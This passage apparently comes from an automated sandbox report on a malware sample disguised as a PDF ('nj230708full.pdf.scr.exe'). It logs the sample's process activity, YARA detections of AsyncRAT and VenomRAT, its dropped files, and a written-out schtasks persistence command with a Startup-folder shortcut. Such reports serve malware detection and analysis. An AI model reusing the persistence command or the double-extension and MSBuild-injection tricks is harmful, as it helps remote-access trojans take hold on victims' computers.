Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: propsys.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: edputil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: appresolver.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: slc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sppc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\winservices.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\winservices.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\winservices.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\winservices.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\winservices.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\winservices.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\winservices.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\winservices.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\winservices.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\winservices.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\winservices.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\winservices.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: propsys.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: edputil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: appresolver.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: slc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sppc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\winservices.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\winservices.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\winservices.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\winservices.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\winservices.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\winservices.exe	Section loaded: ucrtbase_clr0400.dll

Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Roaming\winservices.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: nj230708full.pdf.scr.exe

Static file information: File size 2697122 > 1048576

Source: nj230708full.pdf.scr.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: MSBuild.exe, 00000018.00000002.2137514011.0000000003E59000.00000004.00000800.00020000.00000000.sdmp, winservices.exe, 0000001F.00000000.2151769138.00000000009B2000.00000002.00000001.01000000.0000000C.sdmp, MSBuild.exe, 00000024.00000002.2801398019.0000000003872000.00000004.00000800.00020000.00000000.sdmp, winservices.exe.24.dr
Source:	Binary string: D:\Work\NNProject\HVNCDll\obj\Release\hvnc.pdb source: MSBuild.exe, 00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe

Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_004062FC

Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Code function: 18_2_00AA0E96 push ecx; ret		18_2_00AA0EA9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_00B41270 push edi; ret		36_2_00B41282

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif	File created: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr			Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif			Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Roaming\winservices.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif	File created: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif	Jump to dropped file

Boot Survival

Yara detected AsyncRAT

Source: Yara match	File source: 24.2.MSBuild.exe.d00000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.MSBuild.exe.de9f06.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Yara detected VenomRAT

Source: Yara match

File source: Process Memory Space: MSBuild.exe PID: 5812, type: MEMORYSTR

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Involvement" /tr "wscript //B 'C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.js'" /sc minute /mo 5 /F

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EchoCraft.url

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EchoCraft.url

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Uses an obfuscated file name to hide its real file extension (double extension)

Source: Possible double extension: pdf.scr

Static PE information: nj230708full.pdf.scr.exe

Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Code function: 18_2_00B1231B IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		18_2_00B1231B
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Code function: 18_2_00A9FC88 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		18_2_00A9FC88

Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\186040\Tracks.pif	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\winservices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\winservices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\winservices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\winservices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\winservices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\winservices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\winservices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\winservices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\winservices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\winservices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\winservices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\winservices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\winservices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\winservices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\winservices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\winservices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\winservices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\winservices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\winservices.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\winservices.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\winservices.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\winservices.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\winservices.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\winservices.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\winservices.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\winservices.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\winservices.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\winservices.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\winservices.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\winservices.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\winservices.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\winservices.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\winservices.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\winservices.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\winservices.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\winservices.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
